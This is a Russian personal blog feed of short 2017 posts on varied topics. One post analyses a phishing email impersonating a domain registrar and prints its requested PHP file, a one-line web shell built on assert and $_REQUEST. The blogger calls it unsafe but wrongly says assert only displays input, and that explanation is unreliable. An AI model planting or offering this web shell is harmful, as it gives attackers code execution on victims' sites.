20 марта 2017 в 0:00
Работают они также как обычные считыватели карт, расстояние 8-15 см.
Защита пока такая:
— носите карту, обернув в фольгу
— не храните на основной карте все свои сбережения — лучше использовать для этого отдельный счет, без карты и без доступа по телефону
— внимательнее смотрите на банкоматы: если заметите что-то необычное — воспользуйтесь другим банкоматом.
— периодически (раз в 2 недели) проверяйте списания со счета
2 февраля 2017 в 14:19
В первом издании книги оно звучит так: «Вместо ответа Хоттабыч, кряхтя, приподнялся на ноги, вырвал из бороды тринадцать волосков, мелко их изорвал, выкрикнул какое-то странное слово «лехододиликраскало» и, обессиленный, опустился прямо на опилки, покрывающие арену».
Слова заклинания совпадают с первой строкой иудейского литургического гимна «Леха доди» в ашкеназском произношении и означают «Иди, мой Возлюбленный, навстречу невесте». В более поздних советских изданиях этого слова нет. Вместо этого идет «выкрикнул какое-то странное и очень длинное слово». Кстати, нет и имени автора – вместо «Лазарь» стоит скромная буква Л.
А легендарные «Трах-тибидох» придумал редактор радиопостановки книги (1958 год).
2 февраля 2017 в 12:37
2-х дверный универсал Toyota RV-2. В производство так и не пошёл.
2 февраля 2017 в 11:38
Ученые Гарвардского университета провели исследование данных пользователей онлайн-платформ с бесплатными образовательными курсами. Одним из главных преимуществ этих платформ считается доступность: чтобы овладевать знаниями нужен только интернет. Долгое время предполагалось, что сервисы помогут сократить разрыв в образовательном уровне разных слоев населения и демократизировать знания.
Но оказалось, что это не так. Исследователи проверили данные 68 онлайн-курсов Гарвардского университета и Массачусетского технологического института в период с 2012 по 2014 год. За это время их прошли 164 198 американцев в возрасте от 13 до 69 лет. Самая распространенная категория пользователей — студенты вузов, причем, как правило, из обеспеченных семей. Также онлайн-курсы крайне популярны среди тех, кто так или иначе занимается наукой и технологиями. Люди из бедных районов или с низким уровнем образования оказались в меньшинстве — у них попросту отсутствует тяга к знаниям.
Социально-экономический статус слушателей определялся исходя из трех параметров: уровень образования родителей, средний доход и среднее образование в районе проживания. Результаты работы выявили новую проблему, над которой нужно работать. Теперь ученые заинтересованы выявить связи между средой, в которой проживает человек, и его уровнем образования. Исследование полностью можно прочитать в журнале Science.
Если задуматься, обеспеченный человек меньше времени тратит на мысли о пропитании и выживании — отсюда появляется больше времени на образование. А если над ним ведут шефство — мотивации еще больше. Так что разрыв в образовании сократить не удастся без каких-либо социальных выплат.
2 февраля 2017 в 10:12
1. В каких единицах измеряется святость?
2. Одинаковы ли усилия по освящению ведра воды и реки?
3. Почему освящение происходит ежегодно?
4. Из п.3 следует, что освящение имеет период полураспада, следовательно: Каков период полураспада святости?
5. Что произойдет с мусульманином, выпившим N–ное количество святой воды по ошибке?
6. Святость — есть величина константная или определенные качества священника могут повлиять на силу святости каким–либо образом?
7. Когда в данном месте святости становится больше, означает ли это, что, скажем, в Африке, святости убывает?
21 января 2017 в 21:37
В частности, когда речь касается контрастности. Они думают, что если им видно — значит и другие увидят.
И речь даже не о том большинстве людей, у кого плохое зрение. Я говорю про обычные компьютеры и стандартную настройку яркости на мониторе или экране ТВ.
Даже, если люди заморачиваются с настройкой яркости — наиболее популярная настройка — для просмотра фильмов, и она не подразумевает возможность просмотра начальных светлых оттенков.
Приведу пример:
Подобные «засвеченные» работы чаще всего бывают недооценены именно из-за того, что ничего не видно.P.S.: Чтобы быстро проверить яркость вашего монитора — проверьте, видите ли вы мелкозернистый серый фон этого сайта. Если нет — яркость экрана завышена.
13 января 2017 в 21:21
Нашел довольно интересную статью с перечислением всех вариантов, как можно заменить меню «гамбургер»
13 января 2017 в 21:18
В своей CMS «Движок» эту задачу я решил так: сразу после адреса сайта пишем слово add (англ. «добавить») — откроется добавление страницы.
Конечно, если вы ранее заходили в администрирование сайта по логину и паролю.
Минимум действий.
13 января 2017 в 20:14
Получаю письмо. Тут надо заметить, что письма у меня смотрятся хоть и не через браузер, но почтовый клиент также показывает письма в HTML формате и не показывает реальный адрес отправителя (по-умолчанию). Поэтому ухищрения кульных хацкеров не были видны как на ладони (реальный адрес отправителя письма был info@r01l.ru — одна лишняя буква) и доходить до схемы «взлома» пришлось своим умом, анализируя присланное письмо.
Отправитель: "R01.RU"
Тема: Необходима активация домена [один из моих доменов]
Текст:
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом [один из моих доменов] осуществляется лицом, указанным в качестве его администратора.Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau12fn0f83f.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 28 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
© АО "Регистратор Р01"
8-800-775-37-77,
8-495-616-2747
Что бросается в глаза?
То, что просят создать php-файл. Для проверки обычно достаточно и txt-файла.
Разберем код.
assert — это вывод проверки утверждения. По сути выведет на экран переданную инфу.
stripslashes — удаляет экранирование символов
остается $_REQUEST[R01] — вместо R01 могут написать что угодно. Это то, что передается php-йфалу через POST или GET запрос. И здесь не видно никакой защиты. Получается, что это простой незащищенный файл, который подвержен большинству уязвимостей, через обращение в переменной R01.
Узнал, что аналогичные письма приходят и от имени якобы РосКомНадзора :)
Т.е. цель «хакеров» — не дискриминация определенного сервиса, а временное получение доступа к сайтам.
Зачем?
Отжать домен таким образом не получится.
Удалять файлы обычно бесполезно — есть резервные копии.
Глумиться над сайтами, заменяя картинки — ребячество.
Получить секретную информацию — вряд ли получится, т.к. админ, который на это пойдет, вряд ли будет управлять крупным магазином.
Учитывая волну подобных писем — это не захват определенного сайта.
Остается одно — создание мусорных рекламных сайтов в папках на временно «захваченных» доменах.
10 января 2017 в 14:03
Дизайнер Н. Григорьев (ВНИИТЭ).
10 января 2017 в 13:54
9 января 2017 в 11:15
Фотошоп.
Меню -> Изображение -> Коррекция -> Постеризация
3 или 2.
9 января 2017 в 9:13
Если кто не понял — суть в том, какую монету можно использовать в Европе...
А 2 рубля — за 1 евро, но работает не везде.
Да, иной раз можно и сдачу получить из автомата...
Собрались в Европу — возьмите с собой нашу мелочь )
7 января 2017 в 15:10
Когда говорят SEO-продвижение — это тоже самое, что масло масляное, т.к. обычно эти слова означают одно и то же, несмотря на то, что по смыслу SEO относится к продвижению, а продвижение может быть и не SEO. Но для клиентов это не важно — им главное — получить прибыль от продвижения.
SEO — это в первую очередь текстовое наполнение. Т.е. тексты статей, описания артистов и услуг.Те, кто заявляет, что SEO хромает — обычно имеют в виду, что можно было бы подобрать DESCRIPTION для всех страниц более адекватно, например, взяв или сочинив одно предложение, которое полностью описывает содержание текста.
Второй тип SEO - закупать ссылки с сайтов вашего региона на ссылочных биржах. Этим я также занимаюсь. Результат даёт не сразу, минимальный через месяц, хороший — через полгода, год. Постепенно повышает посещаемость.
Третий тип продвижения — «пройти» по каталогам, блогам и сайтам, т.е. оставить там свою ссылку. Этот тип практически «умер», т.к. поисковые системы перестали учитывать ссылки с ссылочных «помоек». Несмотря на это, всё еще этот тип продвижения многие продолжают предлагать. Не рекомендую.
Четвертый тип продвижения — каталог или магазин с карточками товара. Очень желательно в этом случае указывать реальную цену.
Пятым типом продвижения иной раз могут назвать скрытую рекламу в текстах. Но это все-таки реклама, а SEO — это повышение места в поисковой выдаче.
Других вариантов нет.
6 января 2017 в 22:53